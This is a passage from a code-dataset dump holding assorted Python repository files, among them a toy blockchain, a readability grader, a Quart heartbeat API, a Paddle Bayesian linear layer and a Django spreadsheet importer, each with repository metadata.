create_config_handler(self, name, config_levels, **type_kwargs):\n        type_kwargs = {\n            **self.default_type_kwargs,\n            **{\"overlay\":\n               None if self.overlays is None else self.overlays.get(name, {})},\n            **type_kwargs,\n            }\n        config_type = ConfigType(name=name, **type_kwargs)\n\n        rendered_config_levels = []\n        for config_level in config_levels:\n            if not isinstance(config_level, ConfigLevel):\n                try:\n                    level_preset = self.level_presets[config_level]\n                except (KeyError, TypeError):\n                    # If the level isn't in the preset dict or isn't a str\n                    level_preset = config_level\n                level_class = level_preset.get(LEVEL_CLASS, FileConfigLevel)\n                level_args = level_preset.get(LEVEL_ARGS, {})\n                # If the level was loaded from a preset, use the preset's name\n                if level_preset != config_level:\n                    level_args[\"name\"] = level_args.get(\"name\", config_level)\n                config_level = level_class(\n                    config_type=config_type, **level_args)\n            if (self.ignore_cli_args\n                    and isinstance(config_level, CLIArgsConfigLevel)):\n                continue\n            rendered_config_levels.append(config_level)\n\n        config_handler = ConfigHandler(config_type=config_type,\n                                       config_levels=rendered_config_levels)\n        return config_handler\n","repo_name":"project-mjolnir/brokkr","sub_path":"src/brokkr/config/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":20198,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
{"seq_id":"15186487786","text":"import hashlib\nfrom block import Block\n\nclass Chain():\n    def __init__(self, difficulty):\n        self.difficulty = difficulty\n        #list that can store our blocks\n        self.blocks = []\n        #kind of like a lobby:\n        #if there's data, it'll be mined and added to the chain\n        self.pool = []\n        self.create_origin_block()\n\n    #receives a block and tests it\n    def proof_of_work(self,block):\n        hash = hashlib.sha256()\n        hash.update(str(block).encode('utf-8'))\n        #whether or not the block matches the difficulty requirement\n        return block.hash.hexdigest() == hash.hexdigest() and int(hash.hexdigest(),16) < 2**(256-self.difficulty) and block.previous_hash == self.blocks[-1].hash\n\n    def add_to_chain(self,block):\n        if self.proof_of_work(block):\n            self.blocks.append(block)\n\n    def add_to_pool(self,data):\n        self.pool.append(data)\n\n    #create the initial block\n    def create_origin_block(self):\n        hash = hashlib.sha256()\n        hash.update(\"\".encode('utf-8'))\n        origin = Block(\"Origin\", hash)\n        
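# mine the genesis block so its hash meets the difficulty target\n        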
origin.mine(self.difficulty)\n        self.blocks.append(origin)\n\n    #checks if the pool has blocks, mines them and adds it to chain\n    def mine(self):\n        if len(self.pool) > 0:\n            data = self.pool.pop()\n            block = Block(data,self.blocks[-1].hash)\n            block.mine(self.difficulty)\n            self.add_to_chain(block)\n            print(\"\\n\\n===================================\")\n            print(\"Hash : \",block.hash.hexdigest())\n            print(\"Previous Hash : \",block.previous_hash.hexdigest())\n            print(\"Nonce : \",block.nonce)\n            print(\"Data : \",block.data)\n            print(\"\\n\\n===================================\")\n\n\n\n\n","repo_name":"bhavyabhatia11/CarbonChain","sub_path":"Dummy Blockchain/chain.py","file_name":"chain.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"7558613555","text":"#!/usr/bin/env python3\n\nimport re\nfrom cs50 import get_string\n\n\ndef coleman_liau(L, S):\n    index = 0.0588 * L - 0.296 * S - 15.8\n    return index\n\n\ndef main():\n    \n    # init: string\n    i = get_string(\"Text: \").strip().replace(\"!\", \".\").replace(\"?\", \".\")\n    j = i.split(\".\")\n    m = list(i)\n\n    # compute\n    number_of_letters = 0\n    for _ in m:\n        if _.isalpha():\n            number_of_letters += 1\n    number_of_sentences = len(j) - 1\n    number_of_words = len(i.split(\" \"))\n    x = (number_of_letters / number_of_words) * 100\n    y = (number_of_sentences / number_of_words) * 100\n    z = round(coleman_liau(x, y))\n    print(number_of_letters, number_of_words, number_of_sentences, x, y, z)\n    # return\n    if z < 1:\n        o = \"Before Grade 1\"\n    elif z < 16:\n        o = \"Grade {}\".format(z)\n    else:\n        o = \"Grade 16+\"\n    print(o)\n\nmain()\n","repo_name":"sjin09/CS50","sub_path":"pset/pset6/readability.py","file_name":"readability.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"72326531687","text":"import cv2\nimport holo_detector\nimport argparse\n\n\ndef get_args():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--input_file', required=True, choices='blog_money.mp4 jangsion_id_card.mp4'.split(), help='Name of the input mp4 file')\n    return parser.parse_args()\n\n\ndef main():\n    args = get_args()\n\n    file_name = args.input_file\n    data_dir = '../data'\n    infile = f'{data_dir}/input/{file_name}'\n    mix_outfile = f'{data_dir}/mix_output/{file_name}'\n    heatmap_outfile = f'{data_dir}/heatmap_output/{file_name}'\n\n    if file_name == 'jangsion_id_card.mp4':\n        width, height = 1920, 1080\n    else:\n        width, height = 1080, 640\n    cap = cv2.VideoCapture(infile)\n    cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1920)\n    cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 1080)\n    cap.set(cv2.CAP_PROP_AUTOFOCUS, 1)\n    cap.set(cv2.CAP_PROP_FOCUS, 0)\n\n    fps = cap.get(cv2.CAP_PROP_FPS)\n\n    detector = holo_detector.HoloDetector(debug=True)\n    fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n    mix_out = cv2.VideoWriter(mix_outfile, fourcc, round(fps), (width, height))\n    heatmap_out = cv2.VideoWriter(heatmap_outfile, fourcc, round(fps), (width, height))\n\n    while cap.isOpened():\n        (ret, frame) = cap.read()\n        if frame is None:\n            break\n        holo_mask, img_holo, img_hit = detector.detect_holos(frame)\n        mix_out.write(img_holo)\n        heatmap_out.write(img_hit)\n\n    mix_out.release()\n    heatmap_out.release()\n    cap.release()\n    cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n    
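# example: python detect_holo.py --input_file blog_money.mp4\n    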
main()\n","repo_name":"janguck/generate_data_for_hologram_detector","sub_path":"code/detect_holo.py","file_name":"detect_holo.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10053868207","text":"# -*- coding:utf-8 -*-\nfrom .views.utils import get_qiniu_token\nfrom .views.utils import QINIU_URL\n\n\ndef user_dict(user):\n if not user:\n return None\n info = {\n 'id': user.id,\n 'name': user.name,\n 'phone': user.tel_num,\n 'content': user.content,\n 'avatar': user.avatar,\n 'openid': user.openid,\n 'qiniu_token': get_qiniu_token()\n }\n return info\n\n\ndef _restaurant_dict(res):\n info = {\n 'id': res.id,\n 'name': res.name,\n 'content': res.content,\n 'address': res.address,\n 'spicy_level': res.spicy_level.value if res.spicy_level is not None else '',\n 'cuisine': res.cuisine,\n 'images': [QINIU_URL + image.image_url for image in res.images]\n }\n return info\n\n\ndef restaurant_dict(ress):\n if isinstance(ress, list) or isinstance(ress, tuple):\n info = []\n for res in ress:\n info.append(_restaurant_dict(res))\n return info\n else:\n return _restaurant_dict(ress)","repo_name":"Yucheng-Ren/lunchplace","sub_path":"lunchapp/json_data.py","file_name":"json_data.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16497462037","text":"import pandas as pd\n\n\ndef dataframeDateAssign(df: pd.DataFrame, dateCol=\"pdate\"):\n df[dateCol] = pd.to_datetime(df[dateCol])\n dates = pd.date_range(start=df[dateCol].min(), end=df[dateCol].max())\n df = df.set_index(dateCol).reindex(dates, fill_value=0).reset_index()\n df[dateCol] = [str(i)[:10] for i in df[\"index\"]]\n df = df.drop(columns=[\"index\"])\n return df\n","repo_name":"zhuzhuyan93/streamlit-dashboard","sub_path":"tools/dateTool.py","file_name":"dateTool.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28644657267","text":"import uuid\nimport pathlib\nimport logging\nfrom typing import Optional\n\nfrom quart import Blueprint, request, jsonify as qjsonify, current_app as app\n\nfrom rana.auth import token_check\nfrom rana.errors import BadRequest\nfrom rana.models import validate, HEARTBEAT_MODEL\nfrom rana.utils import jsonify as jsonify\n\nlog = logging.getLogger(__name__)\nbp = Blueprint(\"heartbeats\", __name__)\n\n\nasync def fetch_machine(user_id, mach_name=None, *, app_=None) -> uuid.UUID:\n \"\"\"Return the Machine ID for the given request.\n Creates a new machine for the given user if the given\n X-Machine-Name value is new.\n \"\"\"\n app_ = app_ or app\n\n if mach_name is None:\n try:\n mach_name = request.headers[\"x-machine-name\"]\n except KeyError:\n mach_name = \"root\"\n\n mach_id = await app_.db.fetchval(\n \"\"\"\n select id from machines where name = $1 and user_id = $2\n \"\"\",\n mach_name,\n user_id,\n )\n\n if mach_id is not None:\n return mach_id\n\n mach_id = uuid.uuid4()\n\n await app_.db.execute(\n \"\"\"\n insert into machines (id, user_id, name)\n values ($1, $2, $3)\n \"\"\",\n mach_id,\n user_id,\n mach_name,\n )\n\n return mach_id\n\n\nEXTENSIONS = {\".zig\": \"Zig\"}\n\n\nasync def process_hb(user_id, machine_id, heartbeat, *, app_=None):\n \"\"\"Add a heartbeat.\"\"\"\n app_ = app_ or app\n heartbeat_id = uuid.uuid4()\n\n if heartbeat.get(\"language\") is None:\n entity_path = 
heartbeat[\"entity\"]\n\n if entity_path.lower().startswith(\"c:\"):\n path = pathlib.PureWindowsPath(entity_path)\n else:\n path = pathlib.PurePosixPath(entity_path)\n\n heartbeat[\"language\"] = EXTENSIONS.get(path.suffix)\n\n existing_hb = await app_.db.fetchval(\n \"\"\"\n select id from heartbeats\n where entity = $1 and abs(($2 - time)::bigint) < 60\n limit 1\n \"\"\",\n heartbeat[\"entity\"],\n heartbeat[\"time\"],\n )\n\n if existing_hb:\n existing = await app_.db.fetch_heartbeat_simple(existing_hb)\n log.debug(\n \"found close heartbeat: %r %r dt=%r\",\n existing[\"time\"],\n heartbeat[\"time\"],\n existing[\"time\"] - heartbeat[\"time\"],\n )\n return existing\n\n log.debug(\n \"add heartbeat %r: uid=%r entity=%r lang=%r\",\n heartbeat_id.hex,\n user_id.hex,\n heartbeat[\"entity\"],\n heartbeat[\"language\"],\n )\n\n await app_.db.execute(\n \"\"\"\n insert into heartbeats (id, user_id, machine_id,\n entity, type, category, time,\n is_write, project, branch, language, lines, lineno, cursorpos)\n values\n ($1, $2, $3,\n $4, $5, $6,\n $7, $8, $9,\n $10, $11, $12,\n $13, $14)\n \"\"\",\n heartbeat_id,\n user_id,\n machine_id,\n heartbeat[\"entity\"],\n heartbeat[\"type\"],\n heartbeat[\"category\"],\n heartbeat[\"time\"],\n heartbeat[\"is_write\"],\n heartbeat[\"project\"],\n heartbeat[\"branch\"],\n heartbeat[\"language\"],\n heartbeat[\"lines\"],\n heartbeat[\"lineno\"],\n heartbeat[\"cursorpos\"],\n )\n\n return await app_.db.fetch_heartbeat_simple(heartbeat_id)\n\n\n@bp.route(\"/current/heartbeats\", methods=[\"POST\"])\nasync def post_heartbeat():\n user_id = await token_check()\n raw_json = await request.get_json()\n j = validate(raw_json, HEARTBEAT_MODEL)\n\n machine_id = await fetch_machine(user_id)\n heartbeat = await process_hb(user_id, machine_id, j)\n return jsonify(heartbeat), 201\n\n\n@bp.route(\"/current/heartbeats.bulk\", methods=[\"POST\"])\nasync def post_many_heartbeats():\n user_id = await token_check()\n\n raw_json = await request.get_json()\n if not isinstance(raw_json, list):\n raise BadRequest(\"no heartbeat list provided\")\n\n j = validate(\n {\"hbs\": raw_json},\n {\n \"hbs\": {\n \"type\": \"list\",\n \"schema\": {\"type\": \"dict\", \"schema\": HEARTBEAT_MODEL},\n }\n },\n )[\"hbs\"]\n\n machine_id = await fetch_machine(user_id)\n log.debug(\"adding %d heartbeats\", len(j))\n\n res = []\n for heartbeat in j:\n res.append(await process_hb(user_id, machine_id, heartbeat))\n\n return qjsonify({\"responses\": res}), 201\n","repo_name":"lun-4/rana","sub_path":"rana/blueprints/heartbeats.py","file_name":"heartbeats.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19600549091","text":"import paddle\nfrom paddle import Tensor\nfrom .misc import BayesianModule\nimport paddle.nn.functional as F\nfrom paddle.nn.initializer import Uniform\nfrom model.samplers import GaussianVariational,ScaleMixture\n\nclass BayesLinear(BayesianModule):\n\n \"\"\"Bayesian Linear Layer.\n\n Implementation of a Bayesian Linear Layer as described in the\n 'Weight Uncertainty in Neural Networks' paper.\n \"\"\"\n\n def __init__(self,\n in_features: int,\n out_features: int,\n bias=True,\n params=None,) -> None:\n\n \"\"\"Bayesian Linear Layer.\n\n Parameters\n ----------\n in_features : int\n Number of features to feed in to the layer.\n out_features : out\n Number of features produced by the layer.\n bias: bool\n Is contain bias.\n params:\n prior_pi : float\n Pi weight to be used 
for the ScaleMixture prior.\n prior_sigma1 : float\n Sigma for the first normal distribution in the prior.\n prior_sigma2 : float\n Sigma for the second normal distribution in the prior.\n ...\n \"\"\"\n\n super().__init__()\n if params is None:\n params = {\n # prior P(w), built from the scale mixture\n 'prior_pi': 0.5,\n 'prior_sigma1': 1.0, # -lnσ1=0\n 'prior_sigma2': 0.0025, # -lnσ2≈6\n # approximate posterior q(w|θ), used to initialize mu and rho\n 'posterior_mu_initial': [-0.2, 0.2], # mean std\n 'posterior_rho_initial': [-5.0, -4.0],\n }\n # initialization\n uniform_mu_= Uniform(*params['posterior_mu_initial'])\n uniform_rho_=Uniform(*params['posterior_rho_initial'])\n\n w_mu = paddle.empty(shape=[in_features,out_features])\n w_rho = paddle.empty(shape=[in_features,out_features])\n uniform_mu_(w_mu)\n uniform_rho_(w_rho)\n if bias:\n bias_mu = paddle.empty(shape=[out_features,])\n bias_rho = paddle.empty(shape=[out_features,])\n uniform_mu_(bias_mu)\n uniform_rho_(bias_rho)\n # posterior samplers (P(w|θ)); note bias_mu/bias_rho only exist when bias=True, so the layer assumes bias=True\n self.w_posterior = GaussianVariational(w_mu, w_rho)\n self.bias_posterior = GaussianVariational(bias_mu, bias_rho)\n # prior sampler (P(w))\n self.w_prior = ScaleMixture(params['prior_pi'],params['prior_sigma1'], params['prior_sigma2'])\n if bias:\n self.bias_prior = ScaleMixture(params['prior_pi'],params['prior_sigma1'], params['prior_sigma2'])\n\n self.kl_divergence = 0.0\n\n def forward(self, x: Tensor) -> Tensor:\n\n \"\"\"Calculates the forward pass through the linear layer.\n\n Parameters\n ----------\n x : Tensor\n Inputs to the Bayesian Linear layer.\n\n Returns\n -------\n Tensor\n Output from the Bayesian Linear layer.\n \"\"\"\n\n w = self.w_posterior.sample()\n b = self.bias_posterior.sample()\n\n w_log_prior = self.w_prior.log_prior(w)\n b_log_prior = self.bias_prior.log_prior(b)\n\n w_log_posterior = self.w_posterior.log_posterior()\n b_log_posterior = self.bias_posterior.log_posterior()\n\n total_log_prior = w_log_prior + b_log_prior # prior = sum of the priors of w and b\n total_log_posterior = w_log_posterior + b_log_posterior\n self.kl_divergence = self.kld(total_log_prior, total_log_posterior)\n\n return F.linear(x, w, b)\n\n def kld(self, log_prior: Tensor, log_posterior: Tensor) -> Tensor:\n\n \"\"\"Calculates the KL Divergence. 
(in effect this computes the negative ELBO term: minimizing this KL is maximizing the ELBO)\n\n Uses the weight sampled from the posterior distribution to\n calculate the KL Divergence between the prior and posterior.\n\n Parameters\n ----------\n log_prior : Tensor\n Log likelihood drawn from the prior.\n log_posterior : Tensor\n Log likelihood drawn from the approximate posterior.\n\n Returns\n -------\n Tensor\n Calculated KL Divergence.\n \"\"\"\n\n return log_posterior - log_prior\n","repo_name":"jiaohuix/Bayes_backprop_paddle","sub_path":"bayes_elbo_paddle/model/layers/bayes_linear.py","file_name":"bayes_linear.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20555910701","text":"def add(dic, new_dic):\n \"\"\"\n Add important data here with try/except clauses..\n \"\"\"\n # TODO: Include the most important fields with try/except clauses\n\n # Add organization info: country, city, street and organization\n try:\n l_organization_info = []\n if dic['Num_of_organizations'] >= 1:\n for i in range(dic['Num_of_organizations']):\n key_string_country = \"Organization_country\"+str(i)\n key_string_city = \"Organization_city\" + str(i)\n key_string_street = \"Organization_street\" + str(i)\n key_string_organization = \"Organization_org\" + str(i)\n\n # l_individual = [country, city, street, organization]\n if len(dic[key_string_organization]) > 1:\n l_individual_org = [dic[key_string_country], dic[key_string_city], dic[key_string_street], dic[key_string_organization][1]]\n elif len(dic[key_string_organization]) == 1:\n l_individual_org = [dic[key_string_country], dic[key_string_city], dic[key_string_street], dic[key_string_organization][0]]\n else:\n l_individual_org = [dic[key_string_country], dic[key_string_city], dic[key_string_street], dic[key_string_organization]]\n l_organization_info.append(l_individual_org)\n\n new_dic['Organization_info'] = l_organization_info\n except:\n print(\"No 'Organization_info' found..\")\n\n # Add publication info\n try:\n if dic['full_address']:\n l = dic['full_address'].split(\",\")\n for i, item in enumerate(l):\n l[i] = item.strip()\n\n # Add as list = [street, city, country, full_name]\n try:\n if dic['city']:\n l[1] = dic['city']\n except:\n print(\"No 'city' found in publication info..\")\n try:\n if dic['full_name']:\n l.append(dic['full_name'])\n except:\n print(\"No 'full_name' found in publication info\")\n except:\n print(\"No (publication) 'info' found..\")\n\n # Try publication city\n try:\n if dic[\"city\"]:\n new_dic[\"Publication_city\"] = dic[\"city\"]\n except:\n print(\"No (publication) 'city' found..\")\n\n # Add state\n try:\n new_dic[\"State\"] = dic[\"state\"]\n except:\n print(\"No 'state' found...\")\n\n # Add street\n try:\n new_dic[\"Street\"] = dic[\"street\"]\n except:\n print(\"No (publication) 'street' found..\")\n\n # Add authors\n try:\n l = []\n if dic[\"Num_of_authors\"] >= 1:\n for i in range(dic[\"Num_of_authors\"]):\n author_key = \"Author_name\" + str(i)\n l.append(dic[author_key])\n new_dic[\"Authors\"] = l\n except:\n print(\"No 'Authors' found\")\n\n # Add heading..\n try:\n new_dic[\"Heading\"] = dic['heading']\n except:\n print(\"No 'heading' found..\")\n\n # Add publication type\n try:\n new_dic[\"Publication_type\"] = dic['pubtype']\n except:\n print(\"No 'pubtype' found..\")\n\n # Add publication month\n try:\n new_dic['Publication_month'] = dic['pubmonth']\n except:\n print(\"No 'pubmonth' found..\")\n\n # Add document type\n try:\n new_dic[\"Document_type\"] = 
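For context, kld in the Bayesian linear layer record above returns log q(w|θ) − log P(w) for a single sampled weight. Together with the likelihood term handled by the training loop, this is the usual one-sample Monte Carlo estimate of the variational free energy from 'Weight Uncertainty in Neural Networks' (a sketch of the relation, not text from the repo):

\mathcal{F}(\mathcal{D},\theta)
  = \mathrm{KL}\left[\,q(\mathbf{w}\mid\theta)\,\|\,P(\mathbf{w})\,\right]
    - \mathbb{E}_{q(\mathbf{w}\mid\theta)}\!\left[\log P(\mathcal{D}\mid\mathbf{w})\right]
  \approx \sum_{i=1}^{n}\Big(\log q(\mathbf{w}^{(i)}\mid\theta)
    - \log P(\mathbf{w}^{(i)}) - \log P(\mathcal{D}\mid\mathbf{w}^{(i)})\Big)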
dic[\"doctype\"]\n except:\n print(\"No 'doctype' found..\")\n\n # Add keyword\n try:\n new_dic[\"Keywords\"] = dic[\"keyword\"]\n except:\n print(\"No 'keyword' found..\")\n\n # Add pagecount\n try:\n new_dic[\"Page_count\"] = dic['page_count']\n except:\n print(\"No 'page_count' found\")\n\n # Add subject\n try:\n new_dic[\"Subject\"] = dic[\"subject\"]\n except:\n print(\"No 'subject' found...\")\n\n # Add UID\n try:\n new_dic[\"UID\"] = dic[\"UID\"]\n except:\n print(\"No 'UID' found..\")\n\n # Add volume\n try:\n new_dic[\"Vol\"] = dic['vol']\n except:\n print(\"No 'vol' found..\")\n\n # Add organization\n try:\n new_dic[\"Organization\"] = dic[\"organization\"]\n except:\n print(\"No 'organization' found..\")\n\n # Add issue (whatever that is..)\n try:\n new_dic[\"Issue\"] = dic[\"issue\"]\n except:\n print(\"No 'issue' found..\")\n\n return new_dic","repo_name":"petterasla/IECCS","sub_path":"Information Retrieval/Meta data/Wos Meta/v1/adder.py","file_name":"adder.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3701290748","text":"import torch, copy\nimport numpy as np \nfrom collections import defaultdict\nfrom scripts.descent_dir.directions import Directions\nfrom torch.nn.utils import parameters_to_vector, vector_to_parameters\n\nclass GradHistory(Directions):\n MAX_BATCH_ITER = 10 \n def __init__(self, tasks, alpha):\n super().__init__(tasks)\n self._init_grad_history()\n self.alpha=alpha\n\n def _init_grad_history(self):\n \"\"\" Initialize variables\"\"\"\n\n self.grad_accumulation = defaultdict(list)\n self.squared_grad_accumulation = defaultdict(list)\n self.previous_grad = defaultdict(list)\n self.iterations = 0\n self.grad_mean_prev = []\n\n def _accumulate_gradient_vector_slide(self, grad_vector:dict)->None:\n\n if self.iterations == 0:\n self.grad_accumulation = {t: torch.zeros(self.MAX_BATCH_ITER) for t in self.tasks}\n \n idx = self.iterations%self.MAX_BATCH_ITER\n for t in self.tasks:\n self.grad_accumulation[t][idx] = torch.norm(parameters_to_vector(grad_vector[t]))\n\n def _compute_tension(self,parametrization):\n a=self.alpha\n tension = (a/(1+np.exp(-parametrization*np.exp(1)+np.exp(1)))+1-a)\n return max(0, tension)\n\n\n def _angle_between_vectors(self, vector1, vector2):\n\n # input: vector parameters \n rad = torch.arccos(torch.dot(vector1, vector2)/(torch.norm(vector1)*torch.norm(vector2))).item()\n return rad\n\n def descent_direction(self, grad_params: dict, loss=None)->list:\n \n # Compute common direction between tasks (center direction)\n new_dir = self._descent_direction(grad_params, self.tasks)\n\n self._accumulate_gradient_vector_slide(grad_params)\n self.iterations += 1 \n\n if self.iterations>=self.MAX_BATCH_ITER:\n # compute mean of gradients\n grad_accumulation_mean = {t: torch.sum(self.grad_accumulation[t]) for t in self.tasks}\n\n if self.grad_mean_prev:\n tmp_grad = copy.deepcopy(grad_params[self.tasks[0]])\n bisec_vector = parameters_to_vector(new_dir)\n tension_vector = []\n vector_param = defaultdict(list)\n for t in self.tasks:\n\n # Compute relative change\n vector_param[t] = parameters_to_vector(grad_params[t])\n grad_parametrization = grad_accumulation_mean[t]/self.grad_mean_prev[t] + np.log10(loss[t])\n \n # Compute tension factor\n tension_task = self._compute_tension(grad_parametrization.item())\n\n # Compute tensions of each task\n diff_vec = vector_param[t]-bisec_vector\n unit_vector = diff_vec/torch.norm(diff_vec)\n\n if 
tension_vector == []:\n tension_vector = unit_vector*tension_task\n else:\n tension_vector += unit_vector*tension_task\n\n # Get new descent direction\n tension_vector = bisec_vector + tension_vector\n \n ########################\n ###### check direction\n ##############################\n for t in self.tasks:\n angle = self._angle_between_vectors(vector_param[t], tension_vector)*180/np.pi\n if angle>90:\n unit_vector_param = vector_param[t]/torch.norm(vector_param[t])\n w = tension_vector - torch.dot(tension_vector, unit_vector_param)*unit_vector_param\n w_unit = w/torch.norm(w)\n alpha_angle = np.pi-self._angle_between_vectors(vector_param[t], (tension_vector-vector_param[t]))\n tension_vector = np.tan(alpha_angle)*torch.norm(vector_param[t])*w_unit\n \n ##########################################\n\n vector_to_parameters(tension_vector, tmp_grad)\n new_dir = tmp_grad\n vector_param = []\n tmp_grad = []\n tension_vector = []\n\n self.grad_mean_prev = grad_accumulation_mean\n \n return new_dir\n\n\nif __name__ == \"__main__\":\n \n tasks = ['a', 'b']\n alpha = 0.0\n directions = GradHistory(tasks, alpha)\n\n loss = {}\n loss['a'] = 1.2\n loss['b'] = 1.6\n\n grads = {}\n grads['a'] = torch.tensor([[1., 2., 3.], [4., 5., 6.]])\n grads['b'] = torch.tensor([[7.,8.,9.], [10.,11.,12.]])\n\n\n common_dir = directions.descent_direction(grads, loss)\n\n print(common_dir)","repo_name":"tiemink/MTL_TaskTensioner","sub_path":"scripts/descent_dir/history_directions.py","file_name":"history_directions.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32366377288","text":"import openpyxl\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.views.decorators.http import require_http_methods\n\nfrom internship import models as mdl\nfrom internship.models.cohort import Cohort\nfrom internship.models.internship import Internship\n\n\nfrom internship.models.period import Period\n@require_http_methods(['POST'])\n@login_required\n@permission_required('internship.is_internship_manager', raise_exception=True)\ndef upload_places_file(request, cohort_id):\n cohort = get_object_or_404(Cohort, pk=cohort_id)\n file_name = request.FILES['file']\n if file_name is not None:\n if \".xls\" not in str(file_name):\n messages.add_message(request, messages.ERROR, _('file_must_be_xls'))\n else:\n _save_xls_place(file_name, request.user, cohort)\n\n return HttpResponseRedirect(reverse('internships_places', kwargs={\n 'cohort_id': cohort.id\n }))\n\n\ndef _save_xls_place(file_name, user, cohort):\n workbook = openpyxl.load_workbook(file_name, read_only=True)\n worksheet = workbook.active\n col_reference = 0\n col_name = 1\n col_address = 2\n col_postal_code = 3\n col_city = 4\n col_country = 5\n col_url = 6\n\n # Iterates over the lines of the spreadsheet.\n for count, row in enumerate(worksheet.rows):\n if row[col_reference].value is None \\\n or row[col_reference].value == 0 \\\n or not _is_registration_id(row[col_reference].value):\n continue\n\n reference = \"\"\n if row[col_reference].value < 10:\n reference = \"0\"+str(row[col_reference].value)\n else:\n reference = str(row[col_reference].value)\n\n place = mdl.organization.search(reference=reference)\n 
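_angle_between_vectors in the record above is the standard arccos(u·v / (|u| |v|)) identity. A quick standalone check with torch (the vectors are illustrative):

import math
import torch

u = torch.tensor([1.0, 0.0])
v = torch.tensor([0.0, 1.0])

# arccos of the cosine similarity gives the angle in radians.
rad = torch.arccos(torch.dot(u, v) / (torch.norm(u) * torch.norm(v)))
print(rad.item())                 # ~1.5708 rad (pi/2)
print(math.degrees(rad.item()))   # ~90 degrees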
if place:\n organization = mdl.organization.find_by_id(place[0].id)\n else:\n organization = mdl.organization.Organization(cohort=cohort)\n\n if row[col_reference].value:\n reference = \"\"\n if int(row[col_reference].value) < 10:\n reference = \"0\"+str(row[col_reference].value)\n else:\n reference = str(row[col_reference].value)\n organization.reference = reference\n else:\n organization.reference = None\n\n if row[col_name].value:\n organization.name = row[col_name].value\n organization.acronym = row[col_name].value[:14]\n else:\n organization.name = None\n organization.acronym = None\n\n if row[col_url].value:\n organization.website = row[col_url].value\n else:\n organization.website = \"\"\n\n organization.type = \"service partner\"\n\n organization.save()\n\n if place:\n organization_address = mdl.organization_address.search(organization=organization)\n if not organization_address:\n organization_address = mdl.organization_address.OrganizationAddress()\n else:\n organization_address = organization_address[0]\n else:\n organization_address = mdl.organization_address.OrganizationAddress()\n\n if organization:\n organization_address.label = \"Addr\"+organization.name[:14]\n else:\n organization_address.label = \" \"\n\n if row[col_address].value:\n organization_address.location = row[col_address].value\n else:\n organization_address.location = \" \"\n\n if row[col_postal_code].value:\n organization_address.postal_code = row[col_postal_code].value\n else:\n organization_address.postal_code = \" \"\n\n if row[col_city].value:\n organization_address.city = row[col_city].value\n else:\n organization_address.city = \" \"\n\n if row[col_country].value:\n organization_address.country = row[col_country].value\n else:\n organization_address.country = \" \"\n organization_address.organization = organization\n organization_address.latitude = None\n organization_address.longitude = None\n organization_address.save()\n\n\ndef _is_registration_id(registration_id):\n try:\n int(registration_id)\n return True\n except ValueError:\n return False\n\n\n@login_required\ndef upload_internships_file(request, cohort_id):\n cohort = get_object_or_404(Cohort, pk=cohort_id)\n if request.method == 'POST':\n file_name = request.FILES['file']\n data = request.POST\n internship_id = data[\"internship_id\"]\n if internship_id != \"\":\n internship = Internship.objects.filter(pk=internship_id).first()\n else:\n internship = None\n\n if file_name is not None:\n if \".xls\" not in str(file_name):\n messages.add_message(request, messages.ERROR, _('file_must_be_xls'))\n else:\n __save_xls_internships(request, file_name, request.user, cohort, internship)\n\n return HttpResponseRedirect(reverse('internships', kwargs={'cohort_id': cohort.id}))\n\n\ndef __save_xls_internships(request, file_name, user, cohort, internship):\n workbook = openpyxl.load_workbook(file_name, read_only=True)\n worksheet = workbook.active\n col_reference = 0\n col_spec = 1\n col_master = 2\n # Iterates over the lines of the spreadsheet.\n for count, row in enumerate(worksheet.rows):\n if row[col_reference].value is None \\\n or row[col_reference].value == 0 \\\n or not _is_registration_id(row[col_reference].value):\n continue\n\n if row[col_spec].value is not None:\n check_internship = 0\n if row[col_reference].value:\n reference = \"\"\n if int(row[col_reference].value) < 10:\n reference = \"0\"+str(row[col_reference].value)\n else :\n reference = str(row[col_reference].value)\n organization = mdl.organization.search(reference=reference, 
cohort=cohort)\n # internship.organization = organization[0]\n\n if len(organization) > 0:\n\n spec_value = row[col_spec].value\n spec_value = spec_value.replace(\" \", \"\")\n spec_value = spec_value.replace(\"*\", \"\")\n\n master_value = row[col_master].value\n\n if internship != None and internship.speciality != None:\n speciality = mdl.internship_speciality.search(pk=internship.speciality_id)\n else:\n speciality = mdl.internship_speciality.search(acronym__exact=spec_value, cohort=cohort)\n\n number_place = 0\n periods = mdl.period.Period.objects.filter(cohort=cohort)\n number_period = 1\n for x in range(3, len(periods) + 3):\n if row[x].value is None:\n number_place += 0\n else:\n number_place += int(row[x].value)\n\n for x in range(0, len(speciality)):\n check_internship_offer = mdl.internship_offer.InternshipOffer.objects.filter(speciality=speciality[x],\n organization__reference=organization[0].reference, cohort=cohort)\n if len(check_internship_offer) != 0:\n internship_offer = 